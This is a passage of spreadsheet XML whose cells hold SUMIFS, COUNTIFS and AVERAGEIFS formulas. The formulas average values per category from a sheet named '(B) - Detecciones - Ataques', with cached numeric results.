        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Z$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Z$131 &amp; "*"
    )
)
</f>
        <v>0.08386775763</v>
      </c>
      <c r="AA136" s="536">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BN$3:$BN$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AA$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BN$3:$BN$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AA$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AA$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AA$131 &amp; "*"
    )
)
</f>
        <v>0</v>
      </c>
      <c r="AB136" s="536">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BN$3:$BN$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AB$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BN$3:$BN$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AB$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AB$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AB$131 &amp; "*"
    )
)
</f>
        <v>0.125</v>
      </c>
      <c r="AC136" s="536">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BN$3:$BN$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AC$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BN$3:$BN$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AC$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AC$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AC$131 &amp; "*"
    )
)
</f>
        <v>0.1</v>
      </c>
      <c r="AD136" s="536">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BN$3:$BN$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AD$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BN$3:$BN$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AD$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AD$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AD$131 &amp; "*"
    )
)
</f>
        <v>0</v>
      </c>
      <c r="AE136" s="536">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BN$3:$BN$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AE$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BN$3:$BN$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AE$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AE$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AE$131 &amp; "*"
    )
)
</f>
        <v>0</v>
      </c>
      <c r="AF136" s="538">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BN$3:$BN$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AF$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BN$3:$BN$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AF$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AF$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AF$131 &amp; "*"
    )
)
</f>
        <v>0.01</v>
      </c>
      <c r="AG136" s="271"/>
      <c r="AH136" s="386" t="s">
        <v>2555</v>
      </c>
      <c r="AI136" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BN$3:$BN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AI$131)
</f>
        <v>0</v>
      </c>
      <c r="AJ136" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BN$3:$BN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AJ$131)
</f>
        <v>1</v>
      </c>
      <c r="AK136" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BN$3:$BN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AK$131)
</f>
        <v>0</v>
      </c>
      <c r="AL136" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BN$3:$BN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AL$131)
</f>
        <v>0</v>
      </c>
      <c r="AM136" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AN136" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AO136" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AP136" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AQ136" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BN$3:$BN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AQ$131)
</f>
        <v>0.002631578947</v>
      </c>
      <c r="AR136" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BN$3:$BN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AR$131)
</f>
        <v>0</v>
      </c>
      <c r="AS136" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AT136" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BN$3:$BN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AT$131)
</f>
        <v>0</v>
      </c>
      <c r="AU136" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BN$3:$BN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AU$131)
</f>
        <v>0</v>
      </c>
      <c r="AV136" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BN$3:$BN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AV$131)
</f>
        <v>0</v>
      </c>
      <c r="AW136" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AX136" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BN$3:$BN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AX$131)
</f>
        <v>0</v>
      </c>
      <c r="AY136" s="534" t="s">
        <v>12</v>
      </c>
      <c r="AZ136" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BN$3:$BN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AZ$131)
</f>
        <v>0</v>
      </c>
      <c r="BA136" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BN$3:$BN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BA$131)
</f>
        <v>0</v>
      </c>
      <c r="BB136" s="534" t="s">
        <v>12</v>
      </c>
      <c r="BC136" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BN$3:$BN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BC$131)
</f>
        <v>0</v>
      </c>
      <c r="BD136" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BE136" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BN$3:$BN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BE$131)
</f>
        <v>0</v>
      </c>
      <c r="BF136" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BN$3:$BN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BF$131)
</f>
        <v>0</v>
      </c>
      <c r="BG136" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BN$3:$BN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BG$131)
</f>
        <v>0</v>
      </c>
      <c r="BH136" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BN$3:$BN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BH$131)
</f>
        <v>0</v>
      </c>
      <c r="BI136" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BJ136" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BK136" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BL136" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BN$3:$BN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BL$131)
</f>
        <v>0</v>
      </c>
      <c r="BM136" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BN$3:$BN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BM$131)
</f>
        <v>0.1593487395</v>
      </c>
      <c r="BN136" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BN$3:$BN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BN$131)
</f>
        <v>0</v>
      </c>
      <c r="BO136" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BP136" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BQ136" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BN$3:$BN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BQ$131)
</f>
        <v>0</v>
      </c>
      <c r="BR136" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BS136" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BN$3:$BN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BS$131)
</f>
        <v>0</v>
      </c>
      <c r="BT136" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BU136" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BV136" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BN$3:$BN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BV$131)
</f>
        <v>0</v>
      </c>
      <c r="BW136" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BN$3:$BN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BW$131)
</f>
        <v>0</v>
      </c>
      <c r="BX136" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BY136" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BN$3:$BN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BY$131)
</f>
        <v>0</v>
      </c>
      <c r="BZ136" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BN$3:$BN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BZ$131)
</f>
        <v>0</v>
      </c>
      <c r="CA136" s="534" t="s">
        <v>12</v>
      </c>
      <c r="CB136" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CC136" s="534" t="s">
        <v>12</v>
      </c>
      <c r="CD136" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CE136" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CF136" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BN$3:$BN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CF$131)
</f>
        <v>0</v>
      </c>
      <c r="CG136" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CH136" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BN$3:$BN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CH$131)
</f>
        <v>0</v>
      </c>
      <c r="CI136" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BN$3:$BN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CI$131)
</f>
        <v>0</v>
      </c>
      <c r="CJ136" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CK136" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BN$3:$BN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CK$131)
</f>
        <v>1</v>
      </c>
      <c r="CL136" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CM136" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BN$3:$BN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CM$131)
</f>
        <v>0</v>
      </c>
      <c r="CN136" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BN$3:$BN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CN$131)
</f>
        <v>0</v>
      </c>
      <c r="CO136" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BN$3:$BN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CO$131)
</f>
        <v>0.25</v>
      </c>
      <c r="CP136" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BN$3:$BN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CP$131)
</f>
        <v>0</v>
      </c>
      <c r="CQ136" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BN$3:$BN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CQ$131)
</f>
        <v>0</v>
      </c>
      <c r="CR136" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CS136" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CT136" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BN$3:$BN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CT$131)
</f>
        <v>0</v>
      </c>
      <c r="CU136" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CV136" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BN$3:$BN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CV$131)
</f>
        <v>0</v>
      </c>
      <c r="CW136" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CX136" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BN$3:$BN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CX$131)
</f>
        <v>0</v>
      </c>
      <c r="CY136" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BN$3:$BN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CY$131)
</f>
        <v>0</v>
      </c>
      <c r="CZ136" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DA136" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DB136" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DC136" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DD136" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DE136" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DF136" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DG136" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DH136" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BN$3:$BN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, DH$131)
</f>
        <v>0.04</v>
      </c>
      <c r="DI136" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DJ136" s="519">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BN$3:$BN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, DJ$131)
</f>
        <v>0</v>
      </c>
      <c r="DK136" s="271"/>
    </row>
    <row r="137">
      <c r="J137" s="277"/>
      <c r="K137" s="512"/>
      <c r="L137" s="512"/>
      <c r="M137" s="512"/>
      <c r="N137" s="512"/>
      <c r="O137" s="278"/>
      <c r="Q137" s="271"/>
      <c r="R137" s="386" t="s">
        <v>2556</v>
      </c>
      <c r="S137" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DD$3:$DD$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, S$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DD$3:$DD$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; S$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, S$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; S$131 &amp; "*"
    )
)
</f>
        <v>0.1684561575</v>
      </c>
      <c r="T137" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DD$3:$DD$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, T$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DD$3:$DD$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; T$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, T$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; T$131 &amp; "*"
    )
)
</f>
        <v>0</v>
      </c>
      <c r="U137" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DD$3:$DD$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, U$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DD$3:$DD$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; U$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, U$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; U$131 &amp; "*"
    )
)
</f>
        <v>0.3760526316</v>
      </c>
      <c r="V137" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DD$3:$DD$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, V$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DD$3:$DD$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; V$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, V$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; V$131 &amp; "*"
    )
)
</f>
        <v>0.5</v>
      </c>
      <c r="W137" s="532">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DD$3:$DD$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, W$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DD$3:$DD$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; W$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, W$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; W$131 &amp; "*"
    )
)
</f>
        <v>0</v>
      </c>
      <c r="X137" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DD$3:$DD$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, X$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DD$3:$DD$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; X$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, X$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; X$131 &amp; "*"
    )
)
</f>
        <v>0</v>
      </c>
      <c r="Y137" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DD$3:$DD$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Y$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DD$3:$DD$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Y$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Y$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Y$131 &amp; "*"
    )
)
</f>
        <v>0</v>
      </c>
      <c r="Z137" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DD$3:$DD$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Z$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DD$3:$DD$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Z$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Z$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Z$131 &amp; "*"
    )
)
</f>
        <v>0.2417624945</v>
      </c>
      <c r="AA137" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DD$3:$DD$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AA$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DD$3:$DD$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AA$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AA$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AA$131 &amp; "*"
    )
)
</f>
        <v>0.2307692308</v>
      </c>
      <c r="AB137" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DD$3:$DD$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AB$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DD$3:$DD$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AB$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AB$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AB$131 &amp; "*"
    )
)
</f>
        <v>0.25</v>
      </c>
      <c r="AC137" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DD$3:$DD$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AC$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DD$3:$DD$139,
